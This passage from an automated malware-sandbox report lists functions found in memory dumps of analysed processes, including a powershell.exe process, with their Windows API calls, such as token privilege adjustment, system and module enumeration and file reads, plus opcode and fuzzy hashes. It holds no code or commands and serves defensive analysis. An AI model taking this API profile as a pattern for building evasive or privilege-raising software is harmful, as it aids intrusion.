                                                    • SetThreadUILanguage.KERNEL32(?), ref: 02741148
                                                    Memory Dump Source
                                                    • Source File: 00000016.00000002.2180209790.0000000002740000.00000040.00000001.sdmp, Offset: 02740000, based on PE: false
                                                    Similarity
                                                    • API ID: LanguageThread
                                                    • String ID:
                                                    • API String ID: 243849632-0
                                                    • Opcode ID: cbf2654138651e8a8de5aa7b6107a76e1277042d26005ede01faf99c48e5c63d
                                                    • Instruction ID: 9b41becf6f7984f8b04161150c796f260469a72d9424f44b21e290ea49a9157b
                                                    • Opcode Fuzzy Hash: cbf2654138651e8a8de5aa7b6107a76e1277042d26005ede01faf99c48e5c63d
                                                    • Instruction Fuzzy Hash: 07F0AF35500740DFEB20DF05D885766FBA4EF05A21F88C0AADD494B312DB75A984CAA2
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 003CA36A, Relevance: 1.5, APIs: 1, Instructions: 35COMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • SetErrorMode.KERNELBASE(?), ref: 003CA39C
                                                    Memory Dump Source
                                                    • Source File: 00000016.00000002.2165357993.00000000003CA000.00000040.00000001.sdmp, Offset: 003CA000, based on PE: false
                                                    Similarity
                                                    • API ID: ErrorMode
                                                    • String ID:
                                                    • API String ID: 2340568224-0
                                                    • Opcode ID: ddb02d18c92f1ac04c455c388eb00095e24a8ce1f8661cd2deda1e87b29a155f
                                                    • Instruction ID: fb53a5efbc441c9c232edc994b820d506b888460e1ef2369876e223473f0b417
                                                    • Opcode Fuzzy Hash: ddb02d18c92f1ac04c455c388eb00095e24a8ce1f8661cd2deda1e87b29a155f
                                                    • Instruction Fuzzy Hash: 19F0FF39504B84CFEB218F05D884B65FBA0EF01724F18C0AECD088B702D374AC04CBA2
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 0274096A, Relevance: 1.5, APIs: 1, Instructions: 35COMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • GetSystemInfo.KERNELBASE(?), ref: 0274099C
                                                    Memory Dump Source
                                                    • Source File: 00000016.00000002.2180209790.0000000002740000.00000040.00000001.sdmp, Offset: 02740000, based on PE: false
                                                    Similarity
                                                    • API ID: InfoSystem
                                                    • String ID:
                                                    • API String ID: 31276548-0
                                                    • Opcode ID: da7b09b8adea99eb61ed9b5f936d2cd685326fe0d29cfaf80c5315caef14be29
                                                    • Instruction ID: 3258130754c3b550a7450ce51f4f0dec1f3de590b06ab6c7b0a4cf96e1534d28
                                                    • Opcode Fuzzy Hash: da7b09b8adea99eb61ed9b5f936d2cd685326fe0d29cfaf80c5315caef14be29
                                                    • Instruction Fuzzy Hash: BBF0CD35904740DFEB20DF16D889766FBA0EF15721F08C0AADE494B316D7B5A908CEA2
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 003CAA42, Relevance: 1.5, APIs: 1, Instructions: 34COMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • GetConsoleOutputCP.KERNEL32 ref: 003CAA71
                                                    Memory Dump Source
                                                    • Source File: 00000016.00000002.2165357993.00000000003CA000.00000040.00000001.sdmp, Offset: 003CA000, based on PE: false
                                                    Similarity
                                                    • API ID: ConsoleOutput
                                                    • String ID:
                                                    • API String ID: 3985236979-0
                                                    • Opcode ID: 1575eecb7812573de4b34d65102c3c3d6896396550b1110cb437d5b63138c829
                                                    • Instruction ID: 8030eab7890d5e6b62c27cb55ba4c0d73ff8f18c938fef87183fc3dbc26994c7
                                                    • Opcode Fuzzy Hash: 1575eecb7812573de4b34d65102c3c3d6896396550b1110cb437d5b63138c829
                                                    • Instruction Fuzzy Hash: 75F0C236504B44CFEB11CF15D985B65FB94EF05725F18C0AADD098B642D274E904CBA2
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 003CA974, Relevance: 1.3, APIs: 1, Instructions: 54COMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • CloseHandle.KERNELBASE(?), ref: 003CA9C8
                                                    Memory Dump Source
                                                    • Source File: 00000016.00000002.2165357993.00000000003CA000.00000040.00000001.sdmp, Offset: 003CA000, based on PE: false
                                                    Similarity
                                                    • API ID: CloseHandle
                                                    • String ID:
                                                    • API String ID: 2962429428-0
                                                    • Opcode ID: 75f060f983ae67ee867dc325bc0b7db09a3bcd9ff245767296befd0d8209b7e4
                                                    • Instruction ID: 3cd4cb556481817ff417a0b9563261e9d12b211345060d60aa1364e60cbc0f6b
                                                    • Opcode Fuzzy Hash: 75f060f983ae67ee867dc325bc0b7db09a3bcd9ff245767296befd0d8209b7e4
                                                    • Instruction Fuzzy Hash: 2311E3755093849FD712CF25DC48B96FFA4EF02220F0980EFED45CB252D275A808CB62
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 003CA996, Relevance: 1.3, APIs: 1, Instructions: 43COMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • CloseHandle.KERNELBASE(?), ref: 003CA9C8
                                                    Memory Dump Source
                                                    • Source File: 00000016.00000002.2165357993.00000000003CA000.00000040.00000001.sdmp, Offset: 003CA000, based on PE: false
                                                    Similarity
                                                    • API ID: CloseHandle
                                                    • String ID:
                                                    • API String ID: 2962429428-0
                                                    • Opcode ID: 1970e4765042880e1b1ddd5209083bf2ff09d7dcd45ad6877f746d5bd1bc8335
                                                    • Instruction ID: 3ca24097e0957e51b802d59fff81c47ace838f5aed42867545b121c2acefece3
                                                    • Opcode Fuzzy Hash: 1970e4765042880e1b1ddd5209083bf2ff09d7dcd45ad6877f746d5bd1bc8335
                                                    • Instruction Fuzzy Hash: B501DF75500B44CFEB11DF15D889BA6FB94EF01324F18C4AEDD0ACB642D675A804DB62
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 02BF07F7, Relevance: .0, Instructions: 44COMMON
                                                    Download Yara Rule
                                                    Memory Dump Source
                                                    • Source File: 00000016.00000002.2181880325.0000000002BF0000.00000040.00000040.sdmp, Offset: 02BF0000, based on PE: false
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: be12c9cf9976febefe79b87a8fa4ddeab139aec109a105cd3f66cf204cec5c37
                                                    • Instruction ID: 75b7e087847a3f0cabe42a91ae31f47d4c2bdb13c98730e7f297278157d5396d
                                                    • Opcode Fuzzy Hash: be12c9cf9976febefe79b87a8fa4ddeab139aec109a105cd3f66cf204cec5c37
                                                    • Instruction Fuzzy Hash: 240186B65093805FD711CB05EC40862FFF8EE87660749C4AFEC898B612D225B905CB61
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 02BF081E, Relevance: .0, Instructions: 27COMMON
                                                    Download Yara Rule
                                                    Memory Dump Source
                                                    • Source File: 00000016.00000002.2181880325.0000000002BF0000.00000040.00000040.sdmp, Offset: 02BF0000, based on PE: false
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 920425151d1586068e5e7b38c84f66c6ba11a61692b1602007072c86ee1c2d2b
                                                    • Instruction ID: 8d13ed457ab401c323b18ad7cd61abb57ae9445b27310b9d260fb46f5a3eb11e
                                                    • Opcode Fuzzy Hash: 920425151d1586068e5e7b38c84f66c6ba11a61692b1602007072c86ee1c2d2b
                                                    • Instruction Fuzzy Hash: 55E092766007008BD750CF0AEC41466F7D4EB85A30B58C47FDC0D8B701D175B504CAA1
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 003C23F4, Relevance: .0, Instructions: 15COMMON
                                                    Download Yara Rule
                                                    Memory Dump Source
                                                    • Source File: 00000016.00000002.2165269916.00000000003C2000.00000040.00000001.sdmp, Offset: 003C2000, based on PE: false
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: c168f1b0a78c7b1c786ab406f39e4d9c7cd02313bdb64f92792baf09303124d4
                                                    • Instruction ID: 2ab3fac7524b492c29258c08a2492d27ce0da649852b444b169995f466e74d14
                                                    • Opcode Fuzzy Hash: c168f1b0a78c7b1c786ab406f39e4d9c7cd02313bdb64f92792baf09303124d4
                                                    • Instruction Fuzzy Hash: 91D05E79204A818FD71B8A1DC1A4F9637A4AF55B04F4744FDE840CB6A3C769ED81D200
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 003C23BC, Relevance: .0, Instructions: 14COMMON
                                                    Download Yara Rule
                                                    Memory Dump Source
                                                    • Source File: 00000016.00000002.2165269916.00000000003C2000.00000040.00000001.sdmp, Offset: 003C2000, based on PE: false
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 85602686713ab747e4d717a3158b92544ce8f2af849b4d35ff4700dac3f269d9
                                                    • Instruction ID: b9227397f2e07e54a1208c4f6af4cd7e1e7c1ec1570cd7faf5f0b6bc077897fa
                                                    • Opcode Fuzzy Hash: 85602686713ab747e4d717a3158b92544ce8f2af849b4d35ff4700dac3f269d9
                                                    • Instruction Fuzzy Hash: 74D052383006818FDB2ACA1CC294F5A73E8AF80B00F0644ECBC00CB266C3A8EC80CA00
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Non-executed Functions

                                                    Analysis Process: powershell.exe PID: 660 Parent PID: 2368 powershell.exeCOMMON

                                                    Executed Functions

                                                    Function 01E8ACB7, Relevance: 1.6, APIs: 1, Instructions: 75COMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • AdjustTokenPrivileges.KERNELBASE(?,?,?,?,?,?), ref: 01E8AD37
                                                    Memory Dump Source
                                                    • Source File: 00000018.00000002.2166534885.0000000001E8A000.00000040.00000001.sdmp, Offset: 01E8A000, based on PE: false
                                                    Similarity
                                                    • API ID: AdjustPrivilegesToken
                                                    • String ID:
                                                    • API String ID: 2874748243-0
                                                    • Opcode ID: 5f1facc832dea48bc7476af9b256931661da06c52618ad65bc0dd87e35c9fe78
                                                    • Instruction ID: 601301993472e1a45f1379dbfb90f9d1fd749b6ed0c502ecc953d839922f6d12
                                                    • Opcode Fuzzy Hash: 5f1facc832dea48bc7476af9b256931661da06c52618ad65bc0dd87e35c9fe78
                                                    • Instruction Fuzzy Hash: 7C21B4755097809FDB138F25DC44B92BFF4EF06214F0984ABE9888B563D2319908DB61
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 01E8ACEE, Relevance: 1.6, APIs: 1, Instructions: 52COMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • AdjustTokenPrivileges.KERNELBASE(?,?,?,?,?,?), ref: 01E8AD37
                                                    Memory Dump Source
                                                    • Source File: 00000018.00000002.2166534885.0000000001E8A000.00000040.00000001.sdmp, Offset: 01E8A000, based on PE: false
                                                    Similarity
                                                    • API ID: AdjustPrivilegesToken
                                                    • String ID:
                                                    • API String ID: 2874748243-0
                                                    • Opcode ID: 098c7e2692b461bf2c987e9f0ca87584b4c69abe0147f09c5a31418ee3a6c0d7
                                                    • Instruction ID: 61f0ebd24bc979e9567b3429d0fc6cab77b6b8016c7c852d7c37b0509530d762
                                                    • Opcode Fuzzy Hash: 098c7e2692b461bf2c987e9f0ca87584b4c69abe0147f09c5a31418ee3a6c0d7
                                                    • Instruction Fuzzy Hash: 01119A76500700DFEB21DF59D884BAAFBE4EF48225F08C4AAED49CB662D331E414CB61
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 01E8B2CC, Relevance: 1.6, APIs: 1, Instructions: 50nativeCOMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • NtQuerySystemInformation.NTDLL(?,?,?,?), ref: 01E8B329
                                                    Memory Dump Source
                                                    • Source File: 00000018.00000002.2166534885.0000000001E8A000.00000040.00000001.sdmp, Offset: 01E8A000, based on PE: false
                                                    Similarity
                                                    • API ID: InformationQuerySystem
                                                    • String ID:
                                                    • API String ID: 3562636166-0
                                                    • Opcode ID: cc53a3fdb225baa470f6be7d0a4b3a15af8fa3a74c7dc108ce5e152b311ea893
                                                    • Instruction ID: a95c7b415cb02c6d0d6babbf8e065f3a1c3c42bc94974b501cb9a0425eedd9f5
                                                    • Opcode Fuzzy Hash: cc53a3fdb225baa470f6be7d0a4b3a15af8fa3a74c7dc108ce5e152b311ea893
                                                    • Instruction Fuzzy Hash: BA11A071508780AFDB228F15DC45F56FFB4EF06224F09849AED884B663D275A818DB62
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 01E8B2EE, Relevance: 1.5, APIs: 1, Instructions: 38nativeCOMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • NtQuerySystemInformation.NTDLL(?,?,?,?), ref: 01E8B329
                                                    Memory Dump Source
                                                    • Source File: 00000018.00000002.2166534885.0000000001E8A000.00000040.00000001.sdmp, Offset: 01E8A000, based on PE: false
                                                    Similarity
                                                    • API ID: InformationQuerySystem
                                                    • String ID:
                                                    • API String ID: 3562636166-0
                                                    • Opcode ID: 50dc9c8ebd23996720c8f2b22320c0dd5197084362bc8dd0876f7fc1ba02e4d9
                                                    • Instruction ID: 2398246163f8a872dee38ea32db066053f22911ce6147980424d01c980c0eccd
                                                    • Opcode Fuzzy Hash: 50dc9c8ebd23996720c8f2b22320c0dd5197084362bc8dd0876f7fc1ba02e4d9
                                                    • Instruction Fuzzy Hash: C001AD36500700DFEB21DF49DC85B6AFFA0EF08721F08C09ADD4D0B612D2B5A418DB62
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 028D0118, Relevance: 1.6, APIs: 1, Instructions: 100COMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • SetConsoleTitleW.KERNEL32(?), ref: 028D01D0
                                                    Memory Dump Source
                                                    • Source File: 00000018.00000002.2176660963.00000000028D0000.00000040.00000001.sdmp, Offset: 028D0000, based on PE: false
                                                    Similarity
                                                    • API ID: ConsoleTitle
                                                    • String ID:
                                                    • API String ID: 3358957663-0
                                                    • Opcode ID: bb583a97b9e287de963ba707da31026d5bbe1c000db88d875bcee7ef297e4fa4
                                                    • Instruction ID: 3f7aa0323b0375b36b894441fa54e0705212f56245903c9fd06644f32c685a0e
                                                    • Opcode Fuzzy Hash: bb583a97b9e287de963ba707da31026d5bbe1c000db88d875bcee7ef297e4fa4
                                                    • Instruction Fuzzy Hash: 4A31396650E3C08FE7138B759C65692BFB4AF03310F0E84DBD884CF1A3D6699809D762
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 028D067A, Relevance: 1.6, APIs: 1, Instructions: 93fileCOMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • CreateFileW.KERNELBASE(?,?,?,?,?,?), ref: 028D072D
                                                    Memory Dump Source
                                                    • Source File: 00000018.00000002.2176660963.00000000028D0000.00000040.00000001.sdmp, Offset: 028D0000, based on PE: false
                                                    Similarity
                                                    • API ID: CreateFile
                                                    • String ID:
                                                    • API String ID: 823142352-0
                                                    • Opcode ID: b7a98f64d93b69ba0108adeb8fbda6254efef669ab34f37324b77c6061174174
                                                    • Instruction ID: 242af9bb3bad6274e18550f1feb0674a276513ffbf9b3794c48695732ffc4e1f
                                                    • Opcode Fuzzy Hash: b7a98f64d93b69ba0108adeb8fbda6254efef669ab34f37324b77c6061174174
                                                    • Instruction Fuzzy Hash: 1C317075505380AFE722CF65CC85F56BFF8EF06310F09849EE988CB292D325A808CB61
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 028D0D32, Relevance: 1.6, APIs: 1, Instructions: 89registryCOMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • RegisterEventSourceW.ADVAPI32(?), ref: 028D0DD6
                                                    Memory Dump Source
                                                    • Source File: 00000018.00000002.2176660963.00000000028D0000.00000040.00000001.sdmp, Offset: 028D0000, based on PE: false
                                                    Similarity
                                                    • API ID: EventRegisterSource
                                                    • String ID:
                                                    • API String ID: 1693822063-0
                                                    • Opcode ID: 7660971069c6e4332ec944c28a34e08017e31bee3cc85d7abbf7215678bfc010
                                                    • Instruction ID: 7f510b713ddd6a1ef3e8c8783b39cb191dca6f98a976ba2f14027f022443e856
                                                    • Opcode Fuzzy Hash: 7660971069c6e4332ec944c28a34e08017e31bee3cc85d7abbf7215678bfc010
                                                    • Instruction Fuzzy Hash: EB31E8B5509380AFE712CB25CC45B96BFE8DF06314F0884AAE948CF293D375A909C772
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 01E8AF24, Relevance: 1.6, APIs: 1, Instructions: 88COMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • K32EnumProcessModules.KERNEL32(?,00000E9C,988013B0,00000000,00000000,00000000,00000000), ref: 01E8AFBE
                                                    Memory Dump Source
                                                    • Source File: 00000018.00000002.2166534885.0000000001E8A000.00000040.00000001.sdmp, Offset: 01E8A000, based on PE: false
                                                    Similarity
                                                    • API ID: EnumModulesProcess
                                                    • String ID:
                                                    • API String ID: 1082081703-0
                                                    • Opcode ID: c353390649139cc84cf68a49c722036cc276a7d8bc6343a5633e468e424503a5
                                                    • Instruction ID: b6a3ac7254eeef0daea38c97cbc0f22f84f142cbb49211fe62b8d813cfc45919
                                                    • Opcode Fuzzy Hash: c353390649139cc84cf68a49c722036cc276a7d8bc6343a5633e468e424503a5
                                                    • Instruction Fuzzy Hash: 8A21F8B2509380AFE712CF24DC45B96BFB8EF06320F0884DBE988DB193D225A945C771
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 01E8BD1E, Relevance: 1.6, APIs: 1, Instructions: 88COMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • GetTokenInformation.KERNELBASE(?,00000E9C,988013B0,00000000,00000000,00000000,00000000), ref: 01E8BDBC
                                                    Memory Dump Source
                                                    • Source File: 00000018.00000002.2166534885.0000000001E8A000.00000040.00000001.sdmp, Offset: 01E8A000, based on PE: false
                                                    Similarity
                                                    • API ID: InformationToken
                                                    • String ID:
                                                    • API String ID: 4114910276-0
                                                    • Opcode ID: e5c957886cc2d096797f664202c59a91e2ec5ffed6b32da686264bfa2b29c8a0
                                                    • Instruction ID: 7548631ea40cf33e4c8f8c486c7f28d969306e993a7ea5ba0af787a5903d04d1
                                                    • Opcode Fuzzy Hash: e5c957886cc2d096797f664202c59a91e2ec5ffed6b32da686264bfa2b29c8a0
                                                    • Instruction Fuzzy Hash: 8F31B172509384AFE722CB60CC45F97BFB8EF06210F08859BF984CB193D224A909C7B1
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 028D0FEE, Relevance: 1.6, APIs: 1, Instructions: 84COMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • GetVolumeInformationW.KERNELBASE(?,00000E9C,?,?), ref: 028D109E
                                                    Memory Dump Source
                                                    • Source File: 00000018.00000002.2176660963.00000000028D0000.00000040.00000001.sdmp, Offset: 028D0000, based on PE: false
                                                    Similarity
                                                    • API ID: InformationVolume
                                                    • String ID:
                                                    • API String ID: 2039140958-0
                                                    • Opcode ID: a0e5a4134d2046f87acd8e31f919497d5e36c87fd8fa25854a085953dd35d15b
                                                    • Instruction ID: 190bb17e265403bc015e9277b7d5781074bfebd7fd72e29a06b238d25ac3f697
                                                    • Opcode Fuzzy Hash: a0e5a4134d2046f87acd8e31f919497d5e36c87fd8fa25854a085953dd35d15b
                                                    • Instruction Fuzzy Hash: 9931617550E3C05FD3138B358C55B56BFB4AF43650F1A81DBD8848F2A3D629A909C7B2
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 01E8B01D, Relevance: 1.6, APIs: 1, Instructions: 82COMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • K32GetModuleInformation.KERNEL32(?,00000E9C,988013B0,00000000,00000000,00000000,00000000), ref: 01E8B0AE
                                                    Memory Dump Source
                                                    • Source File: 00000018.00000002.2166534885.0000000001E8A000.00000040.00000001.sdmp, Offset: 01E8A000, based on PE: false
                                                    Similarity
                                                    • API ID: InformationModule
                                                    • String ID:
                                                    • API String ID: 3425974696-0
                                                    • Opcode ID: 2db7130cda81663d79c702db41651e78d01fe717487ffc7737675b39cf83cc11
                                                    • Instruction ID: b458e34d6edc289983021d2bac777b0592ba6eb7dc17121a98f1cf060b128b72
                                                    • Opcode Fuzzy Hash: 2db7130cda81663d79c702db41651e78d01fe717487ffc7737675b39cf83cc11
                                                    • Instruction Fuzzy Hash: C1219471509380EFE722CF15CC45FA6BFB8EF06320F08849AE949DB192D664E909CB71
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 01E8A1A8, Relevance: 1.6, APIs: 1, Instructions: 78COMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • EnumWindows.USER32(?,00000E9C,?,?), ref: 01E8A23E
                                                    Memory Dump Source
                                                    • Source File: 00000018.00000002.2166534885.0000000001E8A000.00000040.00000001.sdmp, Offset: 01E8A000, based on PE: false
                                                    Similarity
                                                    • API ID: EnumWindows
                                                    • String ID:
                                                    • API String ID: 1129996299-0
                                                    • Opcode ID: fd453a34d8e36f1eaed6e9ab146fe7bb328a0c67e5e9b30dba3148fc07345f2e
                                                    • Instruction ID: 8e6d8670ffb0a660fc886e4748da782351fa5d4ab865bdbff40ebf5faac21399
                                                    • Opcode Fuzzy Hash: fd453a34d8e36f1eaed6e9ab146fe7bb328a0c67e5e9b30dba3148fc07345f2e
                                                    • Instruction Fuzzy Hash: D921C77180D3C06FD312CB258C55B66BFB4EF47620F1981DBD888CF693D229A919C7A2
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 028D0784, Relevance: 1.6, APIs: 1, Instructions: 78COMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • GetFileType.KERNELBASE(?,00000E9C,988013B0,00000000,00000000,00000000,00000000), ref: 028D0819
                                                    Memory Dump Source
                                                    • Source File: 00000018.00000002.2176660963.00000000028D0000.00000040.00000001.sdmp, Offset: 028D0000, based on PE: false
                                                    Similarity
                                                    • API ID: FileType
                                                    • String ID:
                                                    • API String ID: 3081899298-0
                                                    • Opcode ID: 887fda64aad990f4f2d34ddb47cd178219179c70ca56cd1ce0e13527737b28b7
                                                    • Instruction ID: c73bd8449f19ce51ddbc067c43c47210df2deddb730dbe97f394149e1f839cf2
                                                    • Opcode Fuzzy Hash: 887fda64aad990f4f2d34ddb47cd178219179c70ca56cd1ce0e13527737b28b7
                                                    • Instruction Fuzzy Hash: 4521DA76508780AFE712CB159C45FA3BFA8EF46720F0981DBF9898F193D224A909C771
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 028D0464, Relevance: 1.6, APIs: 1, Instructions: 77COMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • SHGetFolderPathW.SHELL32(?,00000E9C,?,?), ref: 028D0502
                                                    Memory Dump Source
                                                    • Source File: 00000018.00000002.2176660963.00000000028D0000.00000040.00000001.sdmp, Offset: 028D0000, based on PE: false
                                                    Similarity
                                                    • API ID: FolderPath
                                                    • String ID:
                                                    • API String ID: 1514166925-0
                                                    • Opcode ID: 62b8116a753d34b9ac6425a485776bcefeeacb547289d22d67d4ea53ef8cfb5d
                                                    • Instruction ID: f525bac0339328e12c6066d212c07099952d7a37b4f59e36b6fd08ce54ba960c
                                                    • Opcode Fuzzy Hash: 62b8116a753d34b9ac6425a485776bcefeeacb547289d22d67d4ea53ef8cfb5d
                                                    • Instruction Fuzzy Hash: C7217F7650E3C0AFD3128B358C55B66BFB4EF47610F1A81CBD8848F693D225A919C7B2
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 028D06AE, Relevance: 1.6, APIs: 1, Instructions: 76fileCOMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • CreateFileW.KERNELBASE(?,?,?,?,?,?), ref: 028D072D
                                                    Memory Dump Source
                                                    • Source File: 00000018.00000002.2176660963.00000000028D0000.00000040.00000001.sdmp, Offset: 028D0000, based on PE: false
                                                    Similarity
                                                    • API ID: CreateFile
                                                    • String ID:
                                                    • API String ID: 823142352-0
                                                    • Opcode ID: b2174e73435e677a464e661457edd481155480d23f229b3ff27a2a50208fdcb7
                                                    • Instruction ID: 22342e356ecfd5c73d52fed7d9f5f3a0654e2871a00955475ac48fa027d5a646
                                                    • Opcode Fuzzy Hash: b2174e73435e677a464e661457edd481155480d23f229b3ff27a2a50208fdcb7
                                                    • Instruction Fuzzy Hash: A7217C79500704EFE721DF65CC85F66FBE8EF08750F04846AE949CA692D772E908CB62
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 028D0854, Relevance: 1.6, APIs: 1, Instructions: 75fileCOMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • ReadFile.KERNELBASE(?,00000E9C,988013B0,00000000,00000000,00000000,00000000), ref: 028D08E5
                                                    Memory Dump Source
                                                    • Source File: 00000018.00000002.2176660963.00000000028D0000.00000040.00000001.sdmp, Offset: 028D0000, based on PE: false
                                                    Similarity
                                                    • API ID: FileRead
                                                    • String ID:
                                                    • API String ID: 2738559852-0
                                                    • Opcode ID: f5d98d0eb84d2f5b69ba8576d8c52965176b53150c958efdf4a2c303bd32cc5e
                                                    • Instruction ID: cc9b3a8ee4bc31aa3255df352bb6210822f1e4cbd7299af4cb8b5c16997c92f2
                                                    • Opcode Fuzzy Hash: f5d98d0eb84d2f5b69ba8576d8c52965176b53150c958efdf4a2c303bd32cc5e
                                                    • Instruction Fuzzy Hash: 84219276409380AFE722CF61DC45F96FFB8EF06314F09859BE9449B153C265A909CB71
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 01E8A8B4, Relevance: 1.6, APIs: 1, Instructions: 74threadCOMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • SetThreadPreferredUILanguages.KERNEL32(?,00000E9C,?,?), ref: 01E8A94A
                                                    Memory Dump Source
                                                    • Source File: 00000018.00000002.2166534885.0000000001E8A000.00000040.00000001.sdmp, Offset: 01E8A000, based on PE: false
                                                    Similarity
                                                    • API ID: LanguagesPreferredThread
                                                    • String ID:
                                                    • API String ID: 842807343-0
                                                    • Opcode ID: a65d300e426fdeedd805cb4e9699358a4a5d401cd437fd706b8701d24598c121
                                                    • Instruction ID: 792eb4d8d2c4a19eec3ab7a59217f2a6d059f21f3a5a4284613d54bbd6bcf2c7
                                                    • Opcode Fuzzy Hash: a65d300e426fdeedd805cb4e9699358a4a5d401cd437fd706b8701d24598c121
                                                    • Instruction Fuzzy Hash: C2219575509780AFD3138B259C51B62BFB8EF87620F0981DBE8848B653D224A919C7B6
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 028D0D66, Relevance: 1.6, APIs: 1, Instructions: 71registryCOMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • RegisterEventSourceW.ADVAPI32(?), ref: 028D0DD6
                                                    Memory Dump Source
                                                    • Source File: 00000018.00000002.2176660963.00000000028D0000.00000040.00000001.sdmp, Offset: 028D0000, based on PE: false
                                                    Similarity
                                                    • API ID: EventRegisterSource
                                                    • String ID:
                                                    • API String ID: 1693822063-0
                                                    • Opcode ID: 48cbe653ddadb99b1a186333fdb5234561ce0dc84031162bc2ad88db9f916a45
                                                    • Instruction ID: b7356027da436ccdbb21cd1eca793d1a0e8d70148cead27ef2bc7a2524fcf227
                                                    • Opcode Fuzzy Hash: 48cbe653ddadb99b1a186333fdb5234561ce0dc84031162bc2ad88db9f916a45
                                                    • Instruction Fuzzy Hash: 7C219F75600244AFE720DF25CC85BA6FBE8EF05354F04856AE948DB282D775F908CA66
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 01E8BD52, Relevance: 1.6, APIs: 1, Instructions: 69COMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • GetTokenInformation.KERNELBASE(?,00000E9C,988013B0,00000000,00000000,00000000,00000000), ref: 01E8BDBC
                                                    Memory Dump Source
                                                    • Source File: 00000018.00000002.2166534885.0000000001E8A000.00000040.00000001.sdmp, Offset: 01E8A000, based on PE: false
                                                    Similarity
                                                    • API ID: InformationToken
                                                    • String ID:
                                                    • API String ID: 4114910276-0
                                                    • Opcode ID: 4c266db85e1289f298defd17496f48d2c00dc415ad1e228e166599ce1e3f9e84
                                                    • Instruction ID: 7508849dbcd938501dd1dd2e415d79cf6bea4ce929996da414e338a9eb1075af
                                                    • Opcode Fuzzy Hash: 4c266db85e1289f298defd17496f48d2c00dc415ad1e228e166599ce1e3f9e84
                                                    • Instruction Fuzzy Hash: 73119D72500304EFEB21DF55DC85FAAFBE8EF04320F04856AF9499A281D674A9048BB1
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 01E8B04A, Relevance: 1.6, APIs: 1, Instructions: 67COMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • K32GetModuleInformation.KERNEL32(?,00000E9C,988013B0,00000000,00000000,00000000,00000000), ref: 01E8B0AE
                                                    Memory Dump Source
                                                    • Source File: 00000018.00000002.2166534885.0000000001E8A000.00000040.00000001.sdmp, Offset: 01E8A000, based on PE: false
                                                    Similarity
                                                    • API ID: InformationModule
                                                    • String ID:
                                                    • API String ID: 3425974696-0
                                                    • Opcode ID: d28d860b472111739ac748793cc36276f971fe635e462fd1f48831043a20fb8c
                                                    • Instruction ID: ed7e48bdd4025e0f5dd295b95a4eea07da9c17595efb7b20eeba2e973c7f8f80
                                                    • Opcode Fuzzy Hash: d28d860b472111739ac748793cc36276f971fe635e462fd1f48831043a20fb8c
                                                    • Instruction Fuzzy Hash: 9C11B171600300EFEB20DF19DC85FAAFBE8EF04360F04846AED09CB281D674E9058A71
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 028D0F34, Relevance: 1.6, APIs: 1, Instructions: 67COMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • GetDriveTypeW.KERNELBASE(?), ref: 028D0FB0
                                                    Memory Dump Source
